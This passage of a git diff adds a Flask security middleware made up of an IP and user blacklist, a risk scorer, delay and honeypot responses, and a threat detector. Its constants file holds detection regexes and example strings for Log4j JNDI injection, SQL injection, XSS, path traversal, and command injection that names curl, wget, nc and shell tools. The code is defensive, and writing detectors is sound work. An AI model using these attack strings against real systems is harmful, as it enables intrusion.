"BlacklistManager", + "HoneypotResponder", + "init_security_middleware", + "ResponseAction", + "ResponseHandler", + "ResponseStrategy", + "RiskScorer", + "ThreatDetector", + "ThreatResult", +] diff --git a/security/blacklist.py b/security/blacklist.py new file mode 100644 index 0000000..56b6f12 --- /dev/null +++ b/security/blacklist.py @@ -0,0 +1,255 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +import threading +from datetime import timedelta +from typing import List, Optional + +import db_pool +from db.utils import get_cst_now, get_cst_now_str + + +class BlacklistManager: + """黑名单管理器""" + + def __init__(self) -> None: + self._schema_ready = False + self._schema_lock = threading.Lock() + + def is_ip_banned(self, ip: str) -> bool: + """检查IP是否被封禁""" + ip_text = str(ip or "").strip()[:64] + if not ip_text: + return False + now_str = get_cst_now_str() + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + SELECT 1 + FROM ip_blacklist + WHERE ip = ? + AND is_active = 1 + AND (expires_at IS NULL OR expires_at > ?) + LIMIT 1 + """, + (ip_text, now_str), + ) + return cursor.fetchone() is not None + + def is_user_banned(self, user_id: int) -> bool: + """检查用户是否被封禁""" + if user_id is None: + return False + self._ensure_schema() + user_id_int = int(user_id) + now_str = get_cst_now_str() + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + SELECT 1 + FROM user_blacklist + WHERE user_id = ? + AND is_active = 1 + AND (expires_at IS NULL OR expires_at > ?) + LIMIT 1 + """, + (user_id_int, now_str), + ) + return cursor.fetchone() is not None + + def ban_ip(self, ip: str, reason: str, duration_hours: int = 24, permanent: bool = False): + """封禁IP""" + ip_text = str(ip or "").strip()[:64] + if not ip_text: + return False + reason_text = str(reason or "").strip()[:512] + now_str = get_cst_now_str() + + expires_at: Optional[str] + if permanent: + expires_at = None + else: + hours = max(1, int(duration_hours)) + expires_at = (get_cst_now() + timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S") + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + INSERT INTO ip_blacklist (ip, reason, is_active, added_at, expires_at) + VALUES (?, ?, 1, ?, ?) + ON CONFLICT(ip) DO UPDATE SET + reason = excluded.reason, + is_active = 1, + added_at = excluded.added_at, + expires_at = excluded.expires_at + """, + (ip_text, reason_text, now_str, expires_at), + ) + conn.commit() + return True + + def ban_user(self, user_id: int, reason: str): + """封禁用户""" + return self._ban_user_internal(user_id, reason=reason, duration_hours=24, permanent=False) + + def unban_ip(self, ip: str): + """解除IP封禁""" + ip_text = str(ip or "").strip()[:64] + if not ip_text: + return False + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute("UPDATE ip_blacklist SET is_active = 0 WHERE ip = ?", (ip_text,)) + conn.commit() + return cursor.rowcount > 0 + + def unban_user(self, user_id: int): + """解除用户封禁""" + if user_id is None: + return False + self._ensure_schema() + user_id_int = int(user_id) + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute("UPDATE user_blacklist SET is_active = 0 WHERE user_id = ?", (user_id_int,)) + conn.commit() + return cursor.rowcount > 0 + + def get_banned_ips(self) -> List[dict]: + """获取所有被封禁的IP""" + now_str = get_cst_now_str() + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + SELECT ip, reason, is_active, added_at, expires_at + FROM ip_blacklist + WHERE is_active = 1 + AND (expires_at IS NULL OR expires_at > ?) + ORDER BY added_at DESC + """, + (now_str,), + ) + return [dict(row) for row in cursor.fetchall()] + + def get_banned_users(self) -> List[dict]: + """获取所有被封禁的用户""" + self._ensure_schema() + now_str = get_cst_now_str() + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + SELECT user_id, reason, is_active, added_at, expires_at + FROM user_blacklist + WHERE is_active = 1 + AND (expires_at IS NULL OR expires_at > ?) + ORDER BY added_at DESC + """, + (now_str,), + ) + return [dict(row) for row in cursor.fetchall()] + + def cleanup_expired(self): + """清理过期的封禁记录""" + now_str = get_cst_now_str() + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + UPDATE ip_blacklist + SET is_active = 0 + WHERE is_active = 1 + AND expires_at IS NOT NULL + AND expires_at <= ? + """, + (now_str,), + ) + conn.commit() + + self._ensure_schema() + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + UPDATE user_blacklist + SET is_active = 0 + WHERE is_active = 1 + AND expires_at IS NOT NULL + AND expires_at <= ? + """, + (now_str,), + ) + conn.commit() + + # ==================== Internal ==================== + + def _ensure_schema(self) -> None: + if self._schema_ready: + return + with self._schema_lock: + if self._schema_ready: + return + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + CREATE TABLE IF NOT EXISTS user_blacklist ( + user_id INTEGER PRIMARY KEY, + reason TEXT, + is_active INTEGER DEFAULT 1, + added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + expires_at TIMESTAMP + ) + """ + ) + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)") + cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)") + conn.commit() + self._schema_ready = True + + def _ban_user_internal( + self, + user_id: int, + *, + reason: str, + duration_hours: int = 24, + permanent: bool = False, + ) -> bool: + if user_id is None: + return False + self._ensure_schema() + user_id_int = int(user_id) + reason_text = str(reason or "").strip()[:512] + now_str = get_cst_now_str() + + expires_at: Optional[str] + if permanent: + expires_at = None + else: + hours = max(1, int(duration_hours)) + expires_at = (get_cst_now() + timedelta(hours=hours)).strftime("%Y-%m-%d %H:%M:%S") + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute( + """ + INSERT INTO user_blacklist (user_id, reason, is_active, added_at, expires_at) + VALUES (?, ?, 1, ?, ?) + ON CONFLICT(user_id) DO UPDATE SET + reason = excluded.reason, + is_active = 1, + added_at = excluded.added_at, + expires_at = excluded.expires_at + """, + (user_id_int, reason_text, now_str, expires_at), + ) + conn.commit() + return True + diff --git a/security/constants.py b/security/constants.py new file mode 100644 index 0000000..15b23fc --- /dev/null +++ b/security/constants.py @@ -0,0 +1,97 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +import re + +# ==================== Threat Types ==================== + +THREAT_TYPE_JNDI_INJECTION = "jndi_injection" +THREAT_TYPE_NESTED_EXPRESSION = "nested_expression" +THREAT_TYPE_SQL_INJECTION = "sql_injection" +THREAT_TYPE_XSS = "xss" +THREAT_TYPE_PATH_TRAVERSAL = "path_traversal" +THREAT_TYPE_COMMAND_INJECTION = "command_injection" + + +# ==================== Scores ==================== + +SCORE_JNDI_DIRECT = 100 +SCORE_JNDI_OBFUSCATED = 100 +SCORE_NESTED_EXPRESSION = 80 +SCORE_SQL_INJECTION = 90 +SCORE_XSS = 70 +SCORE_PATH_TRAVERSAL = 60 +SCORE_COMMAND_INJECTION = 85 + + +# ==================== JNDI (Log4j) ==================== +# +# - Direct: ${jndi:ldap://...} / ${jndi:rmi://...} => 100 +# - Obfuscated: ${${xxx:-j}${xxx:-n}...:ldap://...} => detect +# - Nested expression: ${${...}} => 80 + +JNDI_DIRECT_PATTERN = r"\$\{\s*jndi\s*:\s*(?:ldap|rmi)\s*://" + +# Common Log4j "default value" obfuscation variants: +# ${${::-j}${::-n}${::-d}${::-i}:ldap://...} +# ${${foo:-j}${bar:-n}${baz:-d}${qux:-i}:rmi://...} +JNDI_OBFUSCATED_PATTERN = ( + r"\$\{\s*" + r"(?:\$\{[^{}]{0,50}:-j\}|\$\{::-[jJ]\})\s*" + r"(?:\$\{[^{}]{0,50}:-n\}|\$\{::-[nN]\})\s*" + r"(?:\$\{[^{}]{0,50}:-d\}|\$\{::-[dD]\})\s*" + r"(?:\$\{[^{}]{0,50}:-i\}|\$\{::-[iI]\})\s*" + r":\s*(?:ldap|rmi)\s*://" +) + +NESTED_EXPRESSION_PATTERN = r"\$\{\s*\$\{" + + +# ==================== SQL Injection ==================== + +SQLI_UNION_SELECT_PATTERN = r"\bunion\b\s+(?:all\s+)?\bselect\b" +SQLI_OR_1_EQ_1_PATTERN = r"\bor\b\s+1\s*=\s*1\b" + + +# ==================== XSS ==================== + +XSS_SCRIPT_TAG_PATTERN = r"<\s*script\b" +XSS_JS_PROTOCOL_PATTERN = r"javascript\s*:" +XSS_INLINE_EVENT_HANDLER_PATTERN = r"\bon\w+\s*=" + + +# ==================== Path Traversal ==================== + +PATH_TRAVERSAL_PATTERN = r"(?:\.\./|\.\.\\)+" + + +# ==================== Command Injection ==================== + +CMD_INJECTION_OPERATOR_WITH_CMD_PATTERN = ( + r"(?:;|&&|\|\||\|)\s*" + r"(?:bash|sh|zsh|cmd|powershell|pwsh|curl|wget|nc|netcat|python|perl|ruby|php|node|cat|ls|id|whoami|uname|rm)\b" +) +CMD_INJECTION_SUBSHELL_PATTERN = r"(?:`[^`]{1,200}`|\$\([^)]{1,200}\))" + + +# ==================== Compiled Regex ==================== + +_FLAGS = re.IGNORECASE | re.MULTILINE + +JNDI_DIRECT_RE = re.compile(JNDI_DIRECT_PATTERN, _FLAGS) +JNDI_OBFUSCATED_RE = re.compile(JNDI_OBFUSCATED_PATTERN, _FLAGS) +NESTED_EXPRESSION_RE = re.compile(NESTED_EXPRESSION_PATTERN, _FLAGS) + +SQLI_UNION_SELECT_RE = re.compile(SQLI_UNION_SELECT_PATTERN, _FLAGS) +SQLI_OR_1_EQ_1_RE = re.compile(SQLI_OR_1_EQ_1_PATTERN, _FLAGS) + +XSS_SCRIPT_TAG_RE = re.compile(XSS_SCRIPT_TAG_PATTERN, _FLAGS) +XSS_JS_PROTOCOL_RE = re.compile(XSS_JS_PROTOCOL_PATTERN, _FLAGS) +XSS_INLINE_EVENT_HANDLER_RE = re.compile(XSS_INLINE_EVENT_HANDLER_PATTERN, _FLAGS) + +PATH_TRAVERSAL_RE = re.compile(PATH_TRAVERSAL_PATTERN, _FLAGS) + +CMD_INJECTION_OPERATOR_WITH_CMD_RE = re.compile(CMD_INJECTION_OPERATOR_WITH_CMD_PATTERN, _FLAGS) +CMD_INJECTION_SUBSHELL_RE = re.compile(CMD_INJECTION_SUBSHELL_PATTERN, _FLAGS) + diff --git a/security/honeypot.py b/security/honeypot.py new file mode 100644 index 0000000..938fd4a --- /dev/null +++ b/security/honeypot.py @@ -0,0 +1,126 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +import random +import uuid +from typing import Any, Optional + +from app_logger import get_logger + + +class HoneypotResponder: + """蜜罐响应生成器 - 返回假成功响应,欺骗攻击者""" + + def __init__(self, *, rng: Optional[random.Random] = None) -> None: + self._rng = rng or random.SystemRandom() + self._logger = get_logger("app") + + def generate_fake_response(self, endpoint: str, original_data: dict = None) -> dict: + """ + 根据端点生成假的成功响应 + + 策略: + - 邮件发送类: {"success": True, "message": "邮件已发送"} + - 注册类: {"success": True, "user_id": fake_uuid} + - 登录类: {"success": True} 但不设置session + - 通用: {"success": True, "message": "操作成功"} + """ + endpoint_text = str(endpoint or "").strip() + endpoint_lc = endpoint_text.lower() + + category = self._classify_endpoint(endpoint_lc) + response: dict[str, Any] = {"success": True} + + if category == "email": + response["message"] = "邮件已发送" + elif category == "register": + response["user_id"] = str(uuid.uuid4()) + elif category == "login": + # 登录类:保持正常成功响应,但不进行任何 session / token 设置(调用方负责不写 session) + pass + else: + response["message"] = "操作成功" + + response = self._merge_safe_fields(response, original_data) + + self._logger.warning( + "蜜罐响应已生成: endpoint=%s, category=%s, keys=%s", + endpoint_text[:256], + category, + sorted(response.keys()), + ) + return response + + def should_use_honeypot(self, risk_score: int) -> bool: + """风险分>=80使用蜜罐响应""" + score = self._normalize_risk_score(risk_score) + use = score >= 80 + self._logger.debug("蜜罐判定: risk_score=%s => %s", score, use) + return use + + def delay_response(self, risk_score: int) -> float: + """ + 根据风险分计算延迟时间 + 0-20: 0秒 + 21-50: 随机0.5-1秒 + 51-80: 随机1-3秒 + 81-100: 随机3-8秒(蜜罐模式额外延迟消耗攻击者时间) + """ + score = self._normalize_risk_score(risk_score) + + delay = 0.0 + if score <= 20: + delay = 0.0 + elif score <= 50: + delay = float(self._rng.uniform(0.5, 1.0)) + elif score <= 80: + delay = float(self._rng.uniform(1.0, 3.0)) + else: + delay = float(self._rng.uniform(3.0, 8.0)) + + self._logger.debug("蜜罐延迟计算: risk_score=%s => delay_seconds=%.3f", score, delay) + return delay + + # ==================== Internal ==================== + + def _normalize_risk_score(self, risk_score: Any) -> int: + try: + score = int(risk_score) + except Exception: + score = 0 + return max(0, min(100, score)) + + def _classify_endpoint(self, endpoint_lc: str) -> str: + if not endpoint_lc: + return "generic" + + # 先匹配更具体的:注册 / 登录 + if any(k in endpoint_lc for k in ["/register", "register", "signup", "sign-up"]): + return "register" + if any(k in endpoint_lc for k in ["/login", "login", "signin", "sign-in"]): + return "login" + + # 邮件相关:发送验证码 / 重置密码 / 重发验证等 + if any(k in endpoint_lc for k in ["email", "mail", "forgot-password", "reset-password", "resend-verify"]): + return "email" + + return "generic" + + def _merge_safe_fields(self, base: dict, original_data: Optional[dict]) -> dict: + if not isinstance(original_data, dict) or not original_data: + return base + + # 避免把攻击者输入或真实业务结果回显得太明显;仅合并少量“形状字段” + safe_bool_keys = {"need_verify", "need_captcha"} + + merged = dict(base) + for key in safe_bool_keys: + if key in original_data and key not in merged: + try: + merged[key] = bool(original_data.get(key)) + except Exception: + continue + + return merged + diff --git a/security/middleware.py b/security/middleware.py new file mode 100644 index 0000000..025f679 --- /dev/null +++ b/security/middleware.py @@ -0,0 +1,307 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +import logging +from typing import Optional + +from flask import g, jsonify, request +from flask_login import current_user + +from app_logger import get_logger +from app_security import get_rate_limit_ip + +from .blacklist import BlacklistManager +from .honeypot import HoneypotResponder +from .response_handler import ResponseAction, ResponseHandler, ResponseStrategy +from .risk_scorer import RiskScorer +from .threat_detector import ThreatDetector, ThreatResult + +# 全局实例(保持单例,避免重复初始化开销) +detector = ThreatDetector() +blacklist = BlacklistManager() +scorer = RiskScorer(blacklist_manager=blacklist) +handler: Optional[ResponseHandler] = None +honeypot: Optional[HoneypotResponder] = None + + +def _get_handler() -> ResponseHandler: + global handler + if handler is None: + handler = ResponseHandler() + return handler + + +def _get_honeypot() -> HoneypotResponder: + global honeypot + if honeypot is None: + honeypot = HoneypotResponder() + return honeypot + + +def _get_security_log_level(app) -> int: + level_name = str(getattr(app, "config", {}).get("SECURITY_LOG_LEVEL", "INFO") or "INFO").upper() + return int(getattr(logging, level_name, logging.INFO)) + + +def _log(app, level: int, message: str, *args, exc_info: bool = False) -> None: + """按 SECURITY_LOG_LEVEL 控制安全日志输出,避免过多日志影响性能。""" + try: + logger = get_logger("app") + min_level = _get_security_log_level(app) + if int(level) >= int(min_level): + logger.log(int(level), message, *args, exc_info=exc_info) + except Exception: + # 安全模块日志故障不得影响正常请求 + return + + +def _is_static_request(app) -> bool: + """对静态文件请求跳过安全检查以提升性能。""" + try: + path = str(getattr(request, "path", "") or "") + except Exception: + path = "" + + if path.startswith("/static/"): + return True + + try: + static_url_path = getattr(app, "static_url_path", None) or "/static" + if static_url_path and path.startswith(str(static_url_path).rstrip("/") + "/"): + return True + except Exception: + pass + + try: + endpoint = getattr(request, "endpoint", None) + if endpoint in {"static", "serve_static"}: + return True + except Exception: + pass + + return False + + +def _safe_get_user_id() -> Optional[int]: + try: + if hasattr(current_user, "is_authenticated") and current_user.is_authenticated: + return getattr(current_user, "id", None) + except Exception: + return None + return None + + +def _scan_request_threats(req) -> list[ThreatResult]: + """仅扫描 GET query 与 POST JSON body(降低开销与误报)。""" + threats: list[ThreatResult] = [] + + try: + # 1) Query 参数(所有方法均可能携带 query string) + try: + args = getattr(req, "args", None) + if args: + # MultiDict -> dict(list) 以保留多值 + args_dict = args.to_dict(flat=False) if hasattr(args, "to_dict") else dict(args) + threats.extend(detector.scan_input(args_dict, "args")) + except Exception: + pass + + # 2) JSON body(主要针对 POST;其他方法保持兼容) + try: + method = str(getattr(req, "method", "") or "").upper() + except Exception: + method = "" + + if method in {"POST", "PUT", "PATCH", "DELETE"}: + try: + data = req.get_json(silent=True) if hasattr(req, "get_json") else None + except Exception: + data = None + if data is not None: + threats.extend(detector.scan_input(data, "json")) + except Exception: + # 扫描失败不应阻断业务 + return [] + + threats.sort(key=lambda t: int(getattr(t, "score", 0) or 0), reverse=True) + return threats + + +def init_security_middleware(app): + """初始化安全中间件到 Flask 应用。""" + try: + scorer.auto_ban_enabled = bool(app.config.get("AUTO_BAN_ENABLED", True)) + except Exception: + pass + + @app.before_request + def security_check(): + if not bool(app.config.get("SECURITY_ENABLED", True)): + return None + if _is_static_request(app): + return None + + try: + ip = get_rate_limit_ip() + except Exception: + ip = getattr(request, "remote_addr", "") or "" + + user_id = _safe_get_user_id() + + # 默认值,确保后续逻辑可用 + g.risk_score = 0 + g.response_strategy = ResponseStrategy(action=ResponseAction.ALLOW) + g.honeypot_mode = False + g.honeypot_endpoint = None + g.honeypot_generated = False + + try: + # 1) 检查黑名单(静默拒绝,返回通用错误) + try: + if blacklist.is_ip_banned(ip): + _log(app, logging.WARNING, "安全拦截: IP封禁命中 ip=%s path=%s", ip, request.path[:256]) + return jsonify({"error": "服务暂时繁忙,请稍后重试"}), 503 + except Exception: + _log(app, logging.ERROR, "黑名单检查失败(ip) ip=%s", ip, exc_info=True) + + try: + if user_id is not None and blacklist.is_user_banned(user_id): + _log(app, logging.WARNING, "安全拦截: 用户封禁命中 user_id=%s path=%s", user_id, request.path[:256]) + return jsonify({"error": "服务暂时繁忙,请稍后重试"}), 503 + except Exception: + _log(app, logging.ERROR, "黑名单检查失败(user) user_id=%s", user_id, exc_info=True) + + # 2) 扫描威胁(GET query / POST JSON) + threats = _scan_request_threats(request) + + if threats: + max_threat = threats[0] + _log( + app, + logging.WARNING, + "威胁检测: ip=%s user_id=%s type=%s score=%s field=%s rule=%s", + ip, + user_id, + getattr(max_threat, "threat_type", "unknown"), + getattr(max_threat, "score", 0), + getattr(max_threat, "field_name", ""), + getattr(max_threat, "rule", ""), + ) + + # 记录威胁事件(异常不应阻断业务) + try: + payload = getattr(max_threat, "value_preview", "") or getattr(max_threat, "matched", "") or "" + scorer.record_threat( + ip=ip, + user_id=user_id, + threat_type=getattr(max_threat, "threat_type", "unknown"), + score=int(getattr(max_threat, "score", 0) or 0), + request_path=getattr(request, "path", None), + payload=str(payload)[:500] if payload else None, + ) + except Exception: + _log(app, logging.ERROR, "威胁事件记录失败 ip=%s user_id=%s", ip, user_id, exc_info=True) + + # 高危威胁启用蜜罐模式 + if bool(app.config.get("HONEYPOT_ENABLED", True)): + try: + if int(getattr(max_threat, "score", 0) or 0) >= 80: + g.honeypot_mode = True + g.honeypot_endpoint = getattr(request, "endpoint", None) + except Exception: + pass + + # 3) 综合风险分与响应策略 + try: + risk_score = scorer.get_combined_score(ip, user_id) + except Exception: + _log(app, logging.ERROR, "风险分计算失败 ip=%s user_id=%s", ip, user_id, exc_info=True) + risk_score = 0 + + try: + strategy = _get_handler().get_strategy(risk_score) + except Exception: + _log(app, logging.ERROR, "响应策略计算失败 risk_score=%s", risk_score, exc_info=True) + strategy = ResponseStrategy(action=ResponseAction.ALLOW) + + g.risk_score = int(risk_score or 0) + g.response_strategy = strategy + + # 风险分触发蜜罐模式(兼容 ResponseHandler 的 HONEYPOT 策略) + if bool(app.config.get("HONEYPOT_ENABLED", True)): + try: + if getattr(strategy, "action", None) == ResponseAction.HONEYPOT: + g.honeypot_mode = True + except Exception: + pass + + # 4) 应用延迟 + try: + if float(getattr(strategy, "delay_seconds", 0) or 0) > 0: + _get_handler().apply_delay(strategy) + except Exception: + _log(app, logging.ERROR, "延迟应用失败", exc_info=True) + + # 优先短路:避免业务 side effects(例如发送邮件/修改状态) + if getattr(g, "honeypot_mode", False) and bool(app.config.get("HONEYPOT_ENABLED", True)): + try: + fake_payload = None + try: + fake_payload = request.get_json(silent=True) + except Exception: + fake_payload = None + fake_response = _get_honeypot().generate_fake_response( + getattr(g, "honeypot_endpoint", "default"), + fake_payload if isinstance(fake_payload, dict) else None, + ) + g.honeypot_generated = True + return jsonify(fake_response), 200 + except Exception: + _log(app, logging.ERROR, "蜜罐响应生成失败", exc_info=True) + return None + except Exception: + # 全局兜底:安全模块任何异常都不能阻断正常请求 + _log(app, logging.ERROR, "安全中间件发生异常", exc_info=True) + return None + + return None # 继续正常处理 + + @app.after_request + def security_response(response): + """请求后处理 - 兜底应用蜜罐响应。""" + if not bool(app.config.get("SECURITY_ENABLED", True)): + return response + if not bool(app.config.get("HONEYPOT_ENABLED", True)): + return response + + try: + if _is_static_request(app): + return response + except Exception: + pass + + # 如果在 before_request 已经生成过蜜罐响应,则不再覆盖,避免丢失其他 after_request 的改动 + try: + if getattr(g, "honeypot_generated", False): + return response + except Exception: + pass + + try: + if getattr(g, "honeypot_mode", False): + fake_payload = None + try: + fake_payload = request.get_json(silent=True) + except Exception: + fake_payload = None + fake_response = _get_honeypot().generate_fake_response( + getattr(g, "honeypot_endpoint", "default"), + fake_payload if isinstance(fake_payload, dict) else None, + ) + return jsonify(fake_response), 200 + except Exception: + _log(app, logging.ERROR, "请求后蜜罐覆盖失败", exc_info=True) + return response + + return response diff --git a/security/response_handler.py b/security/response_handler.py new file mode 100644 index 0000000..6d781c9 --- /dev/null +++ b/security/response_handler.py @@ -0,0 +1,131 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +import random +import time +from dataclasses import dataclass +from enum import Enum +from typing import Any, Optional + +from app_logger import get_logger + + +class ResponseAction(Enum): + ALLOW = "allow" # 正常放行 + ENHANCE_CAPTCHA = "enhance_captcha" # 增强验证码 + DELAY = "delay" # 静默延迟 + HONEYPOT = "honeypot" # 蜜罐响应 + BLOCK = "block" # 直接拒绝 + + +@dataclass +class ResponseStrategy: + action: ResponseAction + delay_seconds: float = 0 + captcha_level: int = 1 # 1=普通4位, 2=6位, 3=滑块 + message: str | None = None + + +class ResponseHandler: + """响应策略处理器""" + + def __init__(self, *, rng: Optional[random.Random] = None) -> None: + self._rng = rng or random.SystemRandom() + self._logger = get_logger("app") + + def get_strategy(self, risk_score: int, is_banned: bool = False) -> ResponseStrategy: + """ + 根据风险分获取响应策略 + + 0-20分: ALLOW, 无延迟, 普通验证码 + 21-40分: ALLOW, 无延迟, 6位验证码 + 41-60分: DELAY, 1-2秒延迟 + 61-80分: DELAY, 2-5秒延迟 + 81-100分: HONEYPOT, 3-8秒延迟 + 已封禁: BLOCK + """ + score = self._normalize_risk_score(risk_score) + + if is_banned: + strategy = ResponseStrategy(action=ResponseAction.BLOCK, message="访问被拒绝") + self._logger.warning("响应策略: BLOCK (banned=%s, risk_score=%s)", is_banned, score) + return strategy + + if score <= 20: + strategy = ResponseStrategy(action=ResponseAction.ALLOW, delay_seconds=0, captcha_level=1) + elif score <= 40: + strategy = ResponseStrategy(action=ResponseAction.ALLOW, delay_seconds=0, captcha_level=2) + elif score <= 60: + strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=float(self._rng.uniform(1.0, 2.0))) + elif score <= 80: + strategy = ResponseStrategy(action=ResponseAction.DELAY, delay_seconds=float(self._rng.uniform(2.0, 5.0))) + else: + strategy = ResponseStrategy(action=ResponseAction.HONEYPOT, delay_seconds=float(self._rng.uniform(3.0, 8.0))) + + strategy.captcha_level = self._normalize_captcha_level(strategy.captcha_level) + + self._logger.info( + "响应策略: action=%s risk_score=%s delay=%.3f captcha_level=%s", + strategy.action.value, + score, + float(strategy.delay_seconds or 0), + int(strategy.captcha_level), + ) + return strategy + + def apply_delay(self, strategy: ResponseStrategy): + """应用延迟(使用time.sleep)""" + if strategy is None: + return + delay = 0.0 + try: + delay = float(getattr(strategy, "delay_seconds", 0) or 0) + except Exception: + delay = 0.0 + + if delay <= 0: + return + + self._logger.debug("应用延迟: action=%s delay=%.3f", getattr(strategy.action, "value", strategy.action), delay) + time.sleep(delay) + + def get_captcha_requirement(self, strategy: ResponseStrategy) -> dict: + """返回验证码要求 {"required": True, "level": 2}""" + level = 1 + try: + level = int(getattr(strategy, "captcha_level", 1) or 1) + except Exception: + level = 1 + level = self._normalize_captcha_level(level) + + required = True + try: + required = getattr(strategy, "action", None) != ResponseAction.BLOCK + except Exception: + required = True + + payload = {"required": bool(required), "level": level} + self._logger.debug("验证码要求: %s", payload) + return payload + + # ==================== Internal ==================== + + def _normalize_risk_score(self, risk_score: Any) -> int: + try: + score = int(risk_score) + except Exception: + score = 0 + return max(0, min(100, score)) + + def _normalize_captcha_level(self, level: Any) -> int: + try: + i = int(level) + except Exception: + i = 1 + if i <= 1: + return 1 + if i == 2: + return 2 + return 3 + diff --git a/security/risk_scorer.py b/security/risk_scorer.py new file mode 100644 index 0000000..0f0fbfd --- /dev/null +++ b/security/risk_scorer.py @@ -0,0 +1,362 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from __future__ import annotations + +import math +from dataclasses import dataclass +from datetime import timedelta +from typing import Optional + +import db_pool +from db.utils import get_cst_now, get_cst_now_str, parse_cst_datetime + +from . import constants as C +from .blacklist import BlacklistManager + + +@dataclass(frozen=True) +class _ScoreUpdateResult: + ip_score: int + user_score: int + + +@dataclass(frozen=True) +class _BanAction: + reason: str + duration_hours: Optional[int] = None + permanent: bool = False + + +class RiskScorer: + """风险评分引擎 - 计算IP和用户的风险分数""" + + def __init__( + self, + *, + auto_ban_enabled: bool = True, + auto_ban_duration_hours: int = 24, + high_risk_threshold: int = 80, + high_risk_window_hours: int = 1, + high_risk_permanent_ban_count: int = 3, + blacklist_manager: Optional[BlacklistManager] = None, + ) -> None: + self.auto_ban_enabled = bool(auto_ban_enabled) + self.auto_ban_duration_hours = max(1, int(auto_ban_duration_hours)) + self.high_risk_threshold = max(0, int(high_risk_threshold)) + self.high_risk_window_hours = max(1, int(high_risk_window_hours)) + self.high_risk_permanent_ban_count = max(1, int(high_risk_permanent_ban_count)) + self.blacklist = blacklist_manager or BlacklistManager() + + def get_ip_score(self, ip_address: str) -> int: + """获取IP风险分(0-100),从数据库读取""" + ip_text = str(ip_address or "").strip()[:64] + if not ip_text: + return 0 + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute("SELECT risk_score FROM ip_risk_scores WHERE ip = ?", (ip_text,)) + row = cursor.fetchone() + if not row: + return 0 + try: + return max(0, min(100, int(row["risk_score"]))) + except Exception: + return 0 + + def get_user_score(self, user_id: int) -> int: + """获取用户风险分(0-100)""" + if user_id is None: + return 0 + user_id_int = int(user_id) + + with db_pool.get_db() as conn: + cursor = conn.cursor() + cursor.execute("SELECT risk_score FROM user_risk_scores WHERE user_id = ?", (user_id_int,)) + row = cursor.fetchone() + if not row: + return 0 + try: + return max(0, min(100, int(row["risk_score"]))) + except Exception: + return 0 + + def get_combined_score(self, ip: str, user_id: int = None) -> int: + """综合风险分 = max(IP分, 用户分) + 行为加成""" + base = max(self.get_ip_score(ip), self.get_user_score(user_id) if user_id is not None else 0) + bonus = self._get_behavior_bonus(ip, user_id) + return max(0, min(100, int(base + bonus))) + + def record_threat( + self, + ip: str, + user_id: int, + threat_type: str, + score: int, + request_path: str = None, + payload: str = None, + ): + """记录威胁事件到数据库,并更新IP/用户风险分""" + ip_text = str(ip or "").strip()[:64] + user_id_int = int(user_id) if user_id is not None else None + threat_type_text = str(threat_type or "").strip()[:64] or "unknown" + score_int = max(0, int(score)) + path_text = str(request_path or "").strip()[:512] if request_path else None + payload_text = str(payload or "").strip() if payload else None + if payload_text and len(payload_text) > 2048: + payload_text = payload_text[:2048] + + now_str = get_cst_now_str() + + ip_ban_action: Optional[_BanAction] = None + user_ban_action: Optional[_BanAction] = None + + with db_pool.get_db() as conn: + cursor = conn.cursor() + + cursor.execute( + """ + INSERT INTO threat_events ( + threat_type, score, ip, user_id, request_path, value_preview, created_at + ) VALUES (?, ?, ?, ?, ?, ?, ?) + """, + ( + threat_type_text, + score_int, + ip_text or None, + user_id_int, + path_text, + payload_text, + now_str, + ), + ) + + update = self._update_scores(cursor, ip_text, user_id_int, score_int, now_str) + + if self.auto_ban_enabled: + ip_ban_action, user_ban_action = self._get_auto_ban_actions( + cursor, + ip_text, + user_id_int, + threat_type_text, + score_int, + update, + ) + + conn.commit() + + if not self.auto_ban_enabled: + return + + if ip_ban_action and ip_text: + self.blacklist.ban_ip( + ip_text, + reason=ip_ban_action.reason, + duration_hours=ip_ban_action.duration_hours or self.auto_ban_duration_hours, + permanent=ip_ban_action.permanent, + ) + if user_ban_action and user_id_int is not None: + self.blacklist._ban_user_internal( + user_id_int, + reason=user_ban_action.reason, + duration_hours=user_ban_action.duration_hours or self.auto_ban_duration_hours, + permanent=user_ban_action.permanent, + ) + + def decay_scores(self): + """风险分衰减 - 定期调用,降低历史风险分""" + now = get_cst_now() + now_str = now.strftime("%Y-%m-%d %H:%M:%S") + + with db_pool.get_db() as conn: + cursor = conn.cursor() + + cursor.execute("SELECT ip, risk_score, updated_at, created_at FROM ip_risk_scores") + for row in cursor.fetchall(): + ip = row["ip"] + current_score = int(row["risk_score"] or 0) + updated_at = row["updated_at"] or row["created_at"] + hours = self._hours_since(updated_at, now) + if hours <= 0: + continue + new_score = self._apply_hourly_decay(current_score, hours) + if new_score == current_score: + continue + cursor.execute( + "UPDATE ip_risk_scores SET risk_score = ?, updated_at = ? WHERE ip = ?", + (new_score, now_str, ip), + ) + + cursor.execute("SELECT user_id, risk_score, updated_at, created_at FROM user_risk_scores") + for row in cursor.fetchall(): + user_id = int(row["user_id"]) + current_score = 